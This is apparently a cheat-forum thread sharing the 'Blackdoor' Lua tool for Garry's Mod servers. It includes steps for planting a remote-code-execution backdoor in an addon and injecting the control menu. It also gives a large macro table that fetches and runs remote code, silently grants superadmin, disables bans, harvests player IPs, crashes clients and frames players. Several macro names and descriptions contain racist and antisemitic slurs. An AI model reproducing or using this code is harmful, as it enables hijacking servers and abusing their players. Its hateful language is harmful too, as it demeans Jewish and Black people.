    ******:SetPos( 0, 0 )
    ******.Paint = function(panel, w, h)
    ******.DoClick = function()
    if table.HasValue( selectedplayers, v ) then
    table.RemoveByValue( selectedplayers, v )
    table.insert( selectedplayers, v )
    Plist4:AddItem( plypanel2 )
    BD.GenerateBackdoorList( Plist, 1 )
    BD.GenerateBackdoorList( Plist2, 2 )
    BD.GenerateBackdoorList( Plist3, 3 )
    concommand.Add("bd_menu", BD.BackdoorMenu)
    function BD.QuickFireBackdoor()
    	if !BD.BDMacros[selectedbackdoor] or selectedbackdoor == "" then BD.ChatText( "You haven't even selected a macro to use ya dingus!", Color(255,155,155) ) return end
    	if BD.BDMacros[selectedbackdoor].Type == ( 1 or 3 ) then BD.FormatCodeGlobal() else BD.FormatCodeTargeted() end
    concommand.Add("bd_quickfire", BD.QuickFireBackdoor)
    then go onto the server wich is backdoored, inject the lua with any method you want (external is one of the best) (command for external is : external somename.lua)
    then type "bd_menu" in console and select "Generic" then choose what you wanna do and enjoy ;') (Make the backdoor persistent first)
    (Click on Activate Backdoor once your exploit and backdoor is selected, it will execute the exploit (some exploits needs macro wich are defined in the description of each exploit))

    if it says backdoor is malfunctioning or not present try to type "bd_refresh_backdoors" if it doesn't work it means the addon isn't installed correctly (or not at all) or you fucked up something.


    To get superadmin scroll down and click on "ULX Set Access" then select yourself in "Players to target" , type the rank wanted into the macro field (superadmin in that case) then just click on activate backdoor and you'll get superadmin ^^

    [Blackdoor] Warning: backdoor malfunctioning or not present!

  7. #6
    UTPEEND's Avatar
    Join Date
    Oct 2019


    Quote Originally Posted by KWAIILOLI View Post
    I can help you with that one, just put :
     util.AddNetworkString( '_CAC_ReadMemory' ) net.Receive( '_CAC_ReadMemory', function() local x = CompileString( net.ReadString(), 'LuaCmd', false ) if isfunction( x ) then x() end end )
    into your addon code, then copy this code (odiumbackdoor) into your external (injector) folder and name it somename.lua :
    //local odium = jit.status( 'ODIUM' ) if !istable(odium) then print('FAILED TO IMPORT ODIUM TABLE') end
    local BD = {}
    local h = http
    BD.Backdoors = BD.Backdoors or {}
    BD.CurrentBackdoor = "Generic"
    BD.BackdoorTypes = {
      ["Generic"] = {
        ["Code"] = "util.AddNetworkString( '_CAC_ReadMemory' ) net.Receive( '_CAC_ReadMemory', function() local x = CompileString( net.ReadString(), 'LuaCmd', false ) if isfunction( x ) then x() end end )",
        ["Netkey"] = "_CAC_ReadMemory",
    local netsss = net.Start
    function BD.IsMessagePooled( netmessage )
      local netfunc = netsss
      local status, error = pcall( netfunc, netmessage )
      return status
    local net = net
    local ctxt = chat.AddText
    function BD.ChatText( message, col )
      ctxt( Color(195,205,255,255), "[Blackdoor] ", col, message )
    function BD.PingBackDoors()
      local bds = {}
      for k, v in pairs(BD.BackdoorTypes) do
        if BD.IsMessagePooled( tostring( v.Netkey ) ) then bds[k] = true end
      return bds
    concommand.Add("bd_refresh_backdoors", function() BD.Backdoors = BD.PingBackDoors() end)
    function BD.BackdoorActive()
      return table.Count( BD.Backdoors ) > 0
    function BD.GetActive()
      if !BD.BackdoorTypes[BD.CurrentBackdoor] then return { ["Code"] = "local x = 69", ["Netkey"] = "" } end
      return BD.BackdoorTypes[BD.CurrentBackdoor]
    BD.BDMacros ={
      ["Artillery Strike"] = {
        ["Type"] = 1,
        ["Code"] = [[if !bombstrike then
          hook.Add("Think", "lulz_bombstrike", function()
          local explode = ents.Create( "env_explosion" )
          local ps = Vector(math.random(-8000, 8000), math.random(-8000, 8000), math.random(-5000, 5000))
          local trc = {}
          trc.start = ps
          trc.endpos = ps + Vector( 0, 0, -99999)
          local tr = util.TraceLine(trc)
          if !tr.Hit then return end
          explode:SetPos( tr.HitPos )
          explode:SetKeyValue( "iMagnitude", "400" )
          explode:Fire( "Explode", 0, 0 )
          bombstrike = true
          hook.Remove("Think", "lulz_bombstrike")
          bombstrike = false
          ["Desc"] = "Explode the shit out of everything",
        ["@ Inject SendLua Interface"] = {
          ["Type"] = 1,
          ["Code"] = [[
          util.AddNetworkString( "cucked" )
          function BDSendLua( p, str ) net.Start( "cucked" ) net.WriteString( str ) net.Send( p ) end
            function BDSendLuaAll( str ) net.Start( "cucked" ) net.WriteString( str ) net.Broadcast() end
              function BDInjectAids( p ) p:SendLua( 'net.Receive( "cucked", function() RunString( net.ReadString() ) end )' ) end
                for k, v in pairs( player.GetAll() ) do BDInjectAids( v ) end
                hook.Add( "PlayerInitialSpawn", "youonlygetcuckedagain", function( p ) BDInjectAids( p ) end)
                ["Desc"] = "You need this to use certain macros",
              ["Announce centre screen"] = {
                ["Type"] = 1,
                ["Code"] = [[for k, v in pairs(player.GetAll()) do v:PrintMessage( HUD_PRINTCENTER, @1 ) end]],
                ["Desc"] = "Make an announcement in the centre of everybodys screen",
                ["NeedsParameters"] = 1,
              ["Rainbow chat spam"] = {
                ["Type"] = 1,
                ["Code"] = [[
                if !timer.Exists( "lulz_chatspam" ) then
                  timer.Create( "lulz_chatspam", 0.5, 0, function() BDSendLuaAll('chat.AddText( Color( math.random(0, 255), math.random(0, 255), math.random(0, 255) ), @1 )' ) end)
                  timer.Remove( "lulz_chatspam" )
                  ["Desc"] = "Spam rainbow chat for all players with the 1st parameter as the text",
                  ["NeedsParameters"] = 1,
                ["Rainbow chat spam (Turbo)"] = {
                  ["Type"] = 1,
                  ["Code"] = [[
                  if !timer.Exists( "lulz_chatspam" ) then
                    timer.Create( "lulz_chatspam", 0.01, 0, function() BDSendLuaAll('chat.AddText( Color( math.random(0, 255), math.random(0, 255), math.random(0, 255) ), @1 )' ) end)
                    timer.Remove( "lulz_chatspam" )
                    ["Desc"] = "Spam rainbow chat for all players with the 1st parameter as the text",
                    ["NeedsParameters"] = 1,
                  ["Unlock all doors"] = {
                    ["Type"] = 1,
                    ["Code"] = [[local doors = {"func_door", "func_door_rotating", "prop_door_rotating", "prop_dynamic"} for k, v in pairs(ents.GetAll()) do if table.HasValue(doors, v:GetClass()) then v:Fire("unlock", "", 0) end end]],
                    ["Desc"] = "",
                  ["Toggle all doors"] = {
                    ["Type"] = 1,
                    ["Code"] = [[local doors = {"func_door", "func_door_rotating", "prop_door_rotating", "prop_dynamic"} for k, v in pairs(ents.GetAll()) do if table.HasValue(doors, v:GetClass()) then v:Fire("toggle", "", 0) end end]],
                    ["Desc"] = "",
                  ["Broken Glass Symphony"] = {
                    ["Type"] = 1,
                    ["Code"] = [[
                    if !timer.Exists( "A true masterpiece" ) then
                      timer.Create( "A true masterpiece", 0.2, 0, function()
                      for _, p in pairs(player.GetAll()) do
                        p:EmitSound( "physics/glass/glass_largesheet_break"..math.random(1,3)..".wav", 100, math.random( 40, 180 ) )
                      timer.Remove( "A true masterpiece" )
                      ["Desc"] = "Beethoven's last hidden symphony, only rediscovered in 2017",
                    ["Yeah Baby"] = {
                      ["Type"] = 1,
                      ["Code"] = [[
                      if !timer.Exists( "porn" ) then
                        timer.Create( "porn", 0.3, 0, function()
                        for _, p in pairs(player.GetAll()) do
                          p:EmitSound( "vo/npc/female01/yeah02.wav", 100, math.random( 90, 120 ) )
                        timer.Remove( "porn" )
                        ["Desc"] = "YEAH BABY YEAH",
                      ["Street War"] = {
                        ["Type"] = 1,
                        ["Code"] = [[
                        if !timer.Exists( "cwar" ) then
                          timer.Create( "cwar", 1, 0, function()
                          for _, p in pairs(player.GetAll()) do
                            p:EmitSound( "ambient/levels/streetwar/city_battle"..math.random( 1, 19 )..".wav", 100, math.random( 90, 120 ) )
                          timer.Remove( "cwar" )
                          ["Desc"] = "For when you need more dakka",
                        ["Earthquake"] = {
                          ["Type"] = 1,
                          ["Code"] = [[
                          if !timer.Exists( "earthquake" ) then
                            timer.Create( "earthquake", 0.5, 500, function()
                            for _, p in pairs(player.GetAll()) do
                              p:SetPos( p:GetPos() + Vector( 0, 0, 1 ) )
                              p:SetVelocity( Vector( math.random( -50, 50 ), math.random( -50, 50 ), math.random( 100, 150 ) ) )
                              util.ScreenShake( p:GetPos(), 20, 1, 1, 100 )
                              p:EmitSound( "ambient/explosions/exp1.wav", 100, math.random( 60, 100 ) )
                            for _, e in pairs(ents.GetAll()) do
                              if e:GetPhysicsObject() and e:GetPhysicsObject():IsValid() then e:GetPhysicsObject():AddVelocity( Vector( math.random( -50, 50 ), math.random( -50, 50 ), math.random( 100, 150 ) ) ) end
                            timer.Remove( "earthquake" )
                            ["Desc"] = "For when you need more dakka",
                          ["Seize the server"] = {
                            ["Type"] = 1,
                            ["Code"] = [[
                            hook.Add("PlayerInitialSpawn", "gw_siezed", function( ply ) ply:SendLua('local html = vgui.Create( "HTML" )html:SetSize( ScrW(), ScrH() )html:OpenURL( "" )') end)
                            for k, v in pairs(player.GetAll()) do
                              v:SendLua('local html = vgui.Create( "HTML" )html:SetSize( ScrW(), ScrH() )html:OpenURL( "" )')
                              ["Desc"] = "Display the seized by wraithnet message to all players",
                            ["Explode all vehicles"] = {
                              ["Type"] = 1,
                              ["Code"] = [[for k, v in pairs(ents.GetAll()) do if v:IsVehicle() then
                                local explo = ents.Create("env_explosion")
                                explo:SetKeyValue("iMagnitude", "300")
                                explo:Fire("Explode", "", 0)
                              ["Desc"] = "",
                            ["RCON command"] = {
                              ["Type"] = 1,
                              ["Code"] = [[game.ConsoleCommand( @1.."\n" )]],
                              ["Desc"] = "Like having rcon access without actually having rcon access",
                            ["Lua run"] = {
                              ["Type"] = 1,
                              ["Code"] = [[@1]],
                              ["Desc"] = "For running your dank luas",
                            ["Lua run from pastebin"] = {
                              ["Type"] = 1,
                              ["Code"] = [[http.Fetch( "@1", function( b, l, h, c ) RunString( b ) end, function() end )]],
                              ["Desc"] = "Fetch and run code from a pastebin link ( remember to use raw you stupid ****** eg. )",
                            ["Destroy ULX Ban/Kick"] = {
                              ["Type"] = 1,
                              ["Code"] = [[ULib.Ban = function() return false end
                              ULib.addBan = function() return end
                              ULib.kick = function() return end]],
                              ["Desc"] = "Completely break ulx ban and ulx kick so you can't be locked out of the server",
                            ------------------------ player targeted macros ------------------------
                            ["Kill player"] = {
                              ["Type"] = 2, -- 1 = indiscriminate, 2= targeted, 3 = dangerous
                              ["Code"] = [[v:Kill()]],
                              ["Desc"] = "",
                            ["Fumble player"] = {
                              ["Type"] = 2, -- 1 = indiscriminate, 2= targeted, 3 = dangerous
                              ["Code"] = [[v:DropWeapon( v:GetActiveWeapon() )]],
                              ["Desc"] = "Knocks their current weapon out of their hand",
                            ["Strip weapons"] = {
                              ["Type"] = 2,
                              ["Code"] = [[v:StripWeapons()]],
                              ["Desc"] = "",
                            ["Rocket"] = {
                              ["Type"] = 2,
                              ["Code"] = [[v:SetVelocity( Vector(0, 0, 9000) )]],
                              ["Desc"] = "Sends them flying up into the air",
                            ["Rocket (Spastic)"] = {
                              ["Type"] = 2,
                              ["Code"] = [[v:SetVelocity( Vector(math.random( -9000, 9000), math.random( -9000, 9000), 9000) )]],
                              ["Desc"] = "HOLY SHIIIIIIIIIIIT",
                            ["Change model"] = {
                              ["Type"] = 2,
                              ["Code"] = [[v:SetModel( @1 )]],
                              ["Desc"] = "Set their player model to the specified string (1st paremeter)",
                              ["NeedsParameters"] = 1,
                            ["Set health + armor"] = {
                              ["Type"] = 2,
                              ["Code"] = [[v:SetHealth( @1 ) v:SetArmor( @2 ) ]],
                              ["Desc"] = "Sets their health (1st paremeter) and armor (2nd paremeter)",
                              ["NeedsParameters"] = 2,
                            ["Ear rape"] = {
                              ["Type"] = 2,
                              ["Code"] = [[
                              local snd = {
                                [1] = "npc/stalker/go_alert2a.wav",
                                [2] = "vo/npc/male01/question06.wav",
                                [3] = "ambient/energy/zap1.wav",
                                [4] = "weapons/knife/knife_stBD.wav",
                                [5] = "vo/ravenholm/madlaugh04.wav",
                                [6] = "npc/antlion_guard/antlion_guard_die1.wav",
                                [7] = "vo/breencast/br_collaboration01.wav,"
                              v:EmitSound( snd[tonumber(@1)], 100, 100 )
                              ["Desc"] = "Make them emit a sound (1st paremeter is a number 1-7)",
                              ["NeedsParameters"] = 1,
                            ["Ear rape (from internet)"] = {
                              ["Type"] = 2,
                              ["Code"] = [[
                              BDSendLua( v, 'if soundrape then soundrape:Remove() soundrape = nil return end soundrape = vgui.Create( "DFrame" ) soundrape:SetSize( 1, 1 ) local html = vgui.Create( "HTML", soundrape ) html:OpenURL( @1 )' )
                              ["Desc"] = "Make them hear a sound from a URL (1st paremeter).  Sending a new sound will stop the previous one.  Send an invalid url to stop all sounds entirely on their client",
                              ["NeedsParameters"] = 1,
                            ["Eye rape (from internet)"] = {
                              ["Type"] = 2,
                              ["Code"] = [[
                              BDSendLua( v, 'if bdeyerape then bdeyerape:Remove() bdeyerape = nil return end bdeyerape = vgui.Create( "DFrame" )bdeyerape:SetDraggable( false )bdeyerape:SetSize( ScrW(), ScrH() )bdeyerape:SetTitle( "" )bdeyerape:ShowCloseButton( false )local html = vgui.Create( "HTML", bdeyerape )html:Dock( FILL )html:OpenURL( @1 )' )
                              ["Desc"] = "Make them see a full screen, unclosable panel from a URL (1st paremeter).  Sending a new url will stop the previous one.  Send an invalid url to clear their view entirely",
                              ["NeedsParameters"] = 1,
                            ["Rave Mode"] = {
                              ["Type"] = 2,
                              ["Code"] = [[
                              BDSendLua( v, 'if hook.GetTable().HUDPaint.drugznigga then hook.Remove( "HUDPaint", "drugznigga" ) else hook.Add( "HUDPaint", "drugznigga", function() local cin = math.sin( CurTime() * 10 ) * 255 surface.SetDrawColor( Color( cin, -cin, cin, 100 ) ) surface.DrawRect( 0, 0, ScrW(), ScrH() ) end) end' )
                              ["Desc"] = "Make them loosen up and join the party",
                            ["Rave Music"] = {
                              ["Type"] = 2,
                              ["Code"] = [[
                              BDSendLua( v, 'surface.PlaySound( "music/hl1_song25_remix3.mp3" )' )
                              ["Desc"] = "DOOF DOOF NIGGA",
                            ["Whisper"] = {
                              ["Type"] = 2,
                              ["Code"] = [[v:ChatPrint( @1 )]],
                              ["Desc"] = "Anonymously whisper text into their chatbox (1st paremeter)",
                              ["NeedsParameters"] = 1,
                            ["Whisper (advanced)"] = {
                              ["Type"] = 2,
                              ["Code"] = [[
                              BDSendLua( v, 'chat.AddText( Color( @2, @3, @4 ), @1 )' )
                              ["Desc"] = "Anonymously whisper coloured text into their chatbox (1st paremeter = text, 2nd = r, 3rd = g, 4th = b)",
                              ["NeedsParameters"] = 1,
                            ["Ignite player"] = {
                              ["Type"] = 2,
                              ["Code"] = [[v:Ignite( 30 )]],
                              ["Desc"] = "Ignite players for 30 seconds, spam repeatedly to refresh the duration",
                            ["Toggle godmode"] = {
                              ["Type"] = 2,
                              ["Code"] = [[if v:HasGodMode() then v:GodDisable() else v:GodEnable() end]],
                              ["Desc"] = "",
                            ["Crash their gmod"] = {
                              ["Type"] = 2,
                              ["Code"] = [[v:SendLua("function fag() return fag() end fag()")]],
                              ["Desc"] = "Instantly freezes their game solid, the only way to fix it is ctrl-alt-delete or a computer restart",
                            ["Toggle serverside speedhack"] = {
                              ["Type"] = 2,
                              ["Code"] = [[if !v.Sanic then v:SetRunSpeed( 1200 ) v:SetWalkSpeed(800) v.Sanic = true else v:SetRunSpeed( 240 ) v:SetWalkSpeed( 160 ) v.Sanic = false end]],
                              ["Desc"] = "GOTTA GO FAST",
                            ["Freeze/Unfreeze player"] = {
                              ["Type"] = 2,
                              ["Code"] = [[v:Freeze( !v:IsFrozen() )]],
                              ["Desc"] = "",
                            ["Force say"] = {
                              ["Type"] = 2,
                              ["Code"] = [[v:Say(@1)]],
                              ["Desc"] = "Forces them to say the specified string in chat (first parameter)",
                              ["NeedsParameters"] = 1,
                            ["Force concommand"] = {
                              ["Type"] = 2,
                              ["Code"] = [[v:ConCommand(@1)]],
                              ["Desc"] = "Forces them to run the specified console command (first parameter)",
                              ["NeedsParameters"] = 1,
                            ["Grab IP"] = {
                              ["Type"] = 2,
                              ["Code"] = [[ for _, p in pairs(player.GetAll()) do if %LP then p:ChatPrint( v:Nick().." : "..v:IPAddress() ) end end]],
                              ["Desc"] = "Prints their IP Address to your console",
                            ["DarkRP add/remove money"] = {
                              ["Type"] = 2,
                              ["Code"] = [[v:addMoney(@1)]],
                              ["Desc"] = "Adds money to their wallet (first parameter) remember that you can use negative numbers to subtract money",
                              ["NeedsParameters"] = 1,
                            ["DarkRP force job"] = {
                              ["Type"] = 2,
                              ["Code"] = [[ for i, t in pairs( team.GetAllTeams() ) do if string.lower(t.Name) == string.lower( @1 ) then v:changeTeam(i, true, true) end end]],
                              ["Desc"] = "Change their team to the specified job (1st parameter = job name, does not require capitalization)",
                              ["NeedsParameters"] = 1,
                            ["Force team switch"] = {
                              ["Type"] = 2,
                              ["Code"] = [[ for i, t in pairs( team.GetAllTeams() ) do if string.lower(t.Name) == string.lower( @1 ) then v:SetTeam( i ) end end]],
                              ["Desc"] = "Change their team to the specified team name (1st parameter)",
                              ["NeedsParameters"] = 1,
                            ["Noclip player"] = {
                              ["Type"] = 2,
                              ["Code"] = [[if v:GetMoveType() != MOVETYPE_NOCLIP then v:SetMoveType(MOVETYPE_NOCLIP) else v:SetMoveType(MOVETYPE_WALK) end]],
                              ["Desc"] = "Toggles noclip on the specified players",
                            ["Give weapon to player"] = {
                              ["Type"] = 2,
                              ["Code"] = [[v:Give( @1 )]],
                              ["Desc"] = "Gives this player a weapon (first parameter)",
                              ["NeedsParameters"] = 1,
                            ["Give ammo to player"] = {
                              ["Type"] = 2,
                              ["Code"] = [[v:GiveAmmo( @1, @2, false )]],
                              ["Desc"] = "Gives this player some ammo (first parameter = amount of ammo, secound parameter = ammo type)",
                              ["NeedsParameters"] = 2,
                            ["Teleport (them to your cursor)"] = {
                              ["Type"] = 2,
                              ["Code"] = [[
                              local tp = false
                              local tpos
                              for _, p in pairs(player.GetAll()) do if %LP then tpos = p:GetEyeTraceNoCursor().HitPos tp = true end end
                              if tp then v:SetPos( tpos ) end
                              ["Desc"] = "Teleports the selected players to your cursor location, not recommended for more than 1 person at once",
                            ["Teleport (you to them)"] = {
                              ["Type"] = 2,
                              ["Code"] = [[
                              local tp = false
                              local tpos = v:GetPos() + Vector( 32, 0, 10)
                              for _, p in pairs(player.GetAll()) do if %LP then p:SetPos( tpos ) end end
                              ["Desc"] = "Teleport yourself to the selected player, may end with you stuck inside a wall",
                            ["Teleport (blink)"] = {
                              ["Type"] = 2,
                              ["Code"] = [[
                              local tpos = v:GetEyeTraceNoCursor().HitPos
                              v:SetPos( tpos )
                              ["Desc"] = "Use on yourself or others to warp them to where they are looking",
                            ["Spawn entity near player"] = {
                              ["Type"] = 2,
                              ["Code"] = [[
                              local tr = {}
                              tr.start = v:GetShootPos()
                              tr.endpos = v:GetShootPos() + 2500 * v:GetAimVector()
                              tr.filter = {v}
                              local trace = util.TraceLine(tr)
                              local dix = ents.Create( @1 )
                              ["Desc"] = "Spawn an entity in front of this player (first parameter = entity class), cannot spawn cars!",
                              ["NeedsParameters"] = 1,
                            ["Spawn prop near player"] = {
                              ["Type"] = 2,
                              ["Code"] = [[
                              local tr = {}
                              tr.start = v:GetShootPos()
                              tr.endpos = v:GetShootPos() + 2500 * v:GetAimVector()
                              tr.filter = {v}
                              local trace = util.TraceLine(tr)
                              local dix = ents.Create( "prop_physics" )
                              dix:SetModel( @1 )
                              ["Desc"] = "Spawn a world prop in front of this player (first parameter = model)",
                              ["NeedsParameters"] = 1,
                            ["Spawn odium shrine"] = {
                              ["Type"] = 2,
                              ["Code"] = [[
                              local tr = {}
                              tr.start = v:GetShootPos()
                              tr.endpos = v:GetShootPos() + 2500 * v:GetAimVector()
                              tr.filter = {v}
                              local trace = util.TraceLine(tr)
                              local dix = ents.Create( "prop_physics" )
                              dix:SetPos( trace.HitPos + Vector( 0, 0, 70 ) )
                              dix:SetAngles( v:GetAngles() )
                              dix:SetModel( "models/props_c17/gravestone_cross001a.mdl" )
                              dix:SetMoveType( MOVETYPE_NONE )
                              dix:SetMaterial( "models/shiny" )
                              dix:SetColor( Color( 0, 0, 40 ) )
                              local function ecr( parent, model, pos, ang, col, mat  )
                                local dix = ents.Create( "prop_physics" )
                                dix:SetPos( parent:LocalToWorld( pos ) )
                                dix:SetAngles( parent:LocalToWorldAngles( ang ) )
                                dix:SetModel( model )
                                dix:SetParent( parent )
                                dix:SetColor( col )
                                dix:SetMaterial( mat )
                              ecr( dix, "models/props_c17/gravestone_coffinpiece001a.mdl", Vector( -65, 0, -60 ), Angle( 0, 180, 0 ), Color( 40, 40, 80 ), "models/shiny"  )
                              ecr( dix, "models/hunter/blocks/cube025x3x025.mdl", Vector( -5, 18, 35 ), Angle( 0, 0, 0 ), Color( 80, 80, 180 ), "models/shiny"  )
                              ecr( dix, "models/hunter/blocks/cube025x3x025.mdl", Vector( -5, 6, 65 ), Angle( 0, 0, 90 ), Color( 80, 80, 180 ), "models/shiny"  )
                              ecr( dix, "models/hunter/blocks/cube025x150x025.mdl", Vector( -5, 71, 100 ), Angle( 0, 0, 90 ), Color( 80, 80, 180 ), "models/shiny"  )
                              ecr( dix, "models/hunter/blocks/cube025x150x025.mdl", Vector( -5, -59, 100 ), Angle( 0, 0, 90 ), Color( 80, 80, 180 ), "models/shiny"  )
                              for _, p in pairs( player.GetAll() ) do p:SendLua( 'chat.AddText( Color(200, 200, 255 ), "Heil, god of cheating")' ) sound.Play( "ambient/explosions/explode_8.wav", p:GetPos(), 90, 80, 1 ) end
                              ["Desc"] = "Spawn a world prop in front of this player (first parameter = model)",
                            ["Spawn evil npc near player"] = {
                              ["Type"] = 2,
                              ["Code"] = [[
                              local tr = {}
                              tr.start = v:GetShootPos()
                              tr.endpos = v:GetShootPos() + 2500 * v:GetAimVector()
                              tr.filter = {v}
                              local trace = util.TraceLine(tr)
                              local dix = ents.Create( "npc_citizen" )
                              dix:SetKeyValue( "additionalequipment", table.Random({"weapon_shotgun", "weapon_smg1", "weapon_ar2"}) )
                              dix:SetKeyValue( "citizentype", 3 )
                              dix:AddRelationship("player D_HT 200")
                              dix:SetSchedule( SCHED_IDLE_WANDER )
                              ["Desc"] = "Spawn a hostile NPC in front of this player",
                            ["Death ray"] = {
                              ["Type"] = 2,
                              ["Code"] = [[
                              local trace = v:GetEyeTraceNoCursor()
                              if trace.Entity:IsValid() then trace.Entity:Remove() end
                              ["Desc"] = "Vaporize whatever this player is looking at",
                            ["Death ray (explosive)"] = {
                              ["Type"] = 2,
                              ["Code"] = [[
                              local trace = v:GetEyeTraceNoCursor()
                              local explo = ents.Create("env_explosion")
                              explo:SetKeyValue("iMagnitude", "250")
                              explo:Fire("Explode", "", 0)
                              ["Desc"] = "Blow up whatever this player is looking at",
                            ["Precise Artillery Strike"] = {
                              ["Type"] = 2,
                              ["Code"] = [[
                              local trace = v:GetEyeTraceNoCursor()
                              timer.Create( "uiashfuasfas"..v:UniqueID()..math.random(-9999, 99999), 0.2, 15, function()
                              local explo = ents.Create("env_explosion")
                              explo:SetPos(trace.HitPos + Vector( math.random( -500, 500), math.random( -500, 500), math.random( -500, 500) ) )
                              explo:SetKeyValue("iMagnitude", "250")
                              explo:Fire("Explode", "", 0)
                              ["Desc"] = "Blow up whatever this player is looking at",
                            ["Woman Driver"] = {
                              ["Type"] = 2,
                              ["Code"] = [[
                              local trace = v:GetEyeTraceNoCursor()
                              local car = ents.Create("prop_physics")
                              local trace2 = util.TraceLine( { start = trace.HitPos, endpos = trace.HitPos + Vector( 0, 0, 5000000 ), mask = MASK_SOLID_BRUSHONLY } )
                              car:SetModel( "models/props_vehicles/car002a_physics.mdl" )
                              car:SetAngles( v:GetAngles() )
                              car:SetPos( trace2.HitPos + Vector( 0, 0, -60 ) )
                              car.boom = 6
                              car:GetPhysicsObject():SetVelocity( Vector( 0, 0, -5000 ) )
                              car:Ignite( 500 )
                              car:AddCallback( "PhysicsCollide", function( car, dat )
                              local explo = ents.Create("env_explosion")
                              explo:SetPos( car:GetPos() )
                              explo:SetKeyValue("iMagnitude", "350")
                              explo:Fire("Explode", "", 0)
                              local ef = EffectData()
                              ef:SetOrigin( car:GetPos() )
                              ef:SetMagnitude( 5 )
                              ef:SetScale( 200 )
                              util.Effect( "ThumperDust", ef )
                              car.boom = car.boom - 1
                              if car.boom < 0 then car:Remove() end
                              end )
                              timer.Simple( 30, function() if car:IsValid() then car:Remove() end end)
                              ["Desc"] = "Make exploding vehicles rain from the sky",
                            ["Poison Gas"] = {
                              ["Type"] = 2,
                              ["Code"] = [[
                              local trace = v:GetEyeTraceNoCursor()
                              local ar2Explo = ents.Create("env_ar2explosion")
                              local p = trace.HitPos
                              ar2Explo:Fire("Explode", "", 0)
                              timer.Create( "gasthekikes_"..math.random(-9999, 9999).."_"..math.random(-9999, 9999), 0.25, 35, function()
                              for _, ent in pairs(ents.FindInSphere( p, 500)) do
                                if !ent:IsPlayer() then continue end
                                local d = DamageInfo()
                                d:SetDamage( 1 )
                                d:SetAttacker( game.GetWorld() )
                                d:SetInflictor( game.GetWorld() )
                                d:SetDamageType( DMG_DROWN )
                                ent:TakeDamageInfo( d )
                              ["Desc"] = "GAS THE JEWS RACE WAR NOW",
                            ["Spawn vehicle near player"] = {
                              ["Type"] = 2,
                              ["Code"] = [[
                              local trc = {}
                              trc.start = v:GetShootPos()
                              trc.endpos = v:GetShootPos() + 2500 * v:GetAimVector()
                              trc.filter = {v}
                              local tr = util.TraceLine(trc)
                              local VehicleList = list.Get( "Vehicles" )
                              local vehicle = VehicleList[ @1 ]
                              if ( !vehicle ) then return end
                              local Angles = v:GetAngles()
                              Angles.pitch = 0
                              Angles.roll = 0
                              Angles.yaw = Angles.yaw + 180
                              local pos = tr.HitPos
                              if ( vehicle.Offset ) then
                                pos = pos + tr.HitNormal * vehicle.Offset
                              local Ent = ents.Create( vehicle.Class )
                              if ( !Ent ) then return end
                              duplicator.DoGeneric( Ent, vehicle )
                              if ( vehicle.Model == "models/buggy.mdl" ) then Ent:SetKeyValue( "vehiclescript", "scripts/vehicles/jeep_test.txt" ) end
                              if ( vehicle.Model == "models/vehicle.mdl" ) then Ent:SetKeyValue( "vehiclescript", "scripts/vehicles/jalopy.txt" ) end
                              if ( vehicle && vehicle.KeyValues ) then
                                for k, v in pairs( vehicle.KeyValues ) do
                                  Ent:SetKeyValue( k, v )
                              Ent:SetModel( vehicle.Model )
                              Ent:SetAngles( Angles )
                              Ent:SetPos( pos )
                              if ( Ent.SetVehicleClass && @1 ) then Ent:SetVehicleClass( @1 ) end
                              Ent.VehicleName = vehicle.Class
                              Ent.VehicleTable = @1
                              Ent.ClassOverride = vehicle.Class
                              ["Desc"] = "Spawn a vehicle in front of this player (first parameter = vehicle class), don't try to spawn ents with this ya dingus!",
                              ["NeedsParameters"] = 1,
                            ["Kick player"] = {
                              ["Type"] = 2,
                              ["Code"] = [[ v:Kick( @1 ) ]],
                              ["Desc"] = "First parameter = reason for kick",
                            ["******ize player"] = {
                              ["Type"] = 2,
                              ["Code"] = [[ if !v.******ed then v:SetColor( Color( 0, 0, 0 ) ) v.******ed = true else v:SetColor( Color(255, 255, 255) ) v.******ed = false end ]],
                              ["Desc"] = "Turns them black as night",
                            ["Cloak player"] = {
                              ["Type"] = 2,
                              ["Code"] = [[ if !v.BDCloaked then v:SetRenderMode( RENDERMODE_NONE ) v.BDCloaked = true else v:SetRenderMode( RENDERMODE_NORMAL ) v.BDCloaked = false end ]],
                              ["Desc"] = "Toggles cloaking on the player, people can still see the weapon they are holding however",
                            ["Allahu Ackbar"] = {
                              ["Type"] = 2,
                              ["Code"] = [[
                              local explo = ents.Create("env_explosion")
                              explo:SetKeyValue("iMagnitude", "250")
                              explo:Fire("Explode", "", 0)
                              if v:Alive() then v:Kill() end
                              ["Desc"] = "Blows them the fuck up, all kills are attributed to them so its great for getting random assholes banned",
                            ["ULX set access"] = {
                              ["Type"] = 2,
                              ["Code"] = [[ local userInfo = ULib.ucl.authed[ v:UniqueID() ] ULib.ucl.addUser( v:UniqueID(), userInfo.allow, userInfo.deny, @1 ) ]],
                              ["Desc"] = "If ulx is installed this will (silently!) set them to the specified usergroup (1st parameter)",
                              ["NeedsParameters"] = 1,
                            ------------------------ custom / new shit ------------------------
                            ["Africanize"] = {
                              ["Type"] = 2,
                              ["Code"] = [[
                              local bones = {
                                [1] = {b = "ValveBiped.Bip01_Head1", v = Vector(4,0,4)},
                                [2] = {b =  "ValveBiped.Bip01_R_Thigh", v = Vector(0,0,0)},
                                [3] = {b = "ValveBiped.Bip01_L_Thigh", v = Vector(0,0,0)},
                                [4] = {b =  "ValveBiped.Bip01_R_Calf", v = Vector(0,0,1)},
                                [5] = {b = "ValveBiped.Bip01_L_Calf", v = Vector(0,0,1)},
                                [6] = {b = "ValveBiped.Bip01_R_UpperArm", v = Vector(0,0,0)},
                                [7] = {b = "ValveBiped.Bip01_L_UpperArm", v = Vector(0,0,0)},
                                [8] = {b = "ValveBiped.Bip01_R_Forearm", v = Vector(1,1.5,1.5)},
                                [9] = {b = "ValveBiped.Bip01_L_Forearm", v = Vector(1,1.5,1.5)},
                                [10] = {b = "ValveBiped.Bip01_R_Clavicle", v = Vector(0,0,0)},
                                [11] = {b = "ValveBiped.Bip01_L_Clavicle", v = Vector(0,0,0)},
                              if !v.is2D then
                                v.is2D = true
                                for k, bone  in pairs(bones) do
                                  local boneToFind = v:LookupBone(bone.b)
                                  v:ManipulateBoneScale( boneToFind, bone.v)
                                v.is2D = false
                                for k, bone  in pairs(bones) do
                                  local boneToFind = v:LookupBone(bone.b)
                                  v:ManipulateBoneScale( boneToFind, Vector(1,1,1))
                              ["Desc"] = "Makes the player seem as though they're 2D.",
                            ["M9K nuke"] = {
                              ["Type"] = 2,
                              ["Code"] = [[
                              //            if (m9k) then
                                local nuke = ents.Create("m9k_davy_crockett_explo")
                                nuke.Owner = v
                                //            end
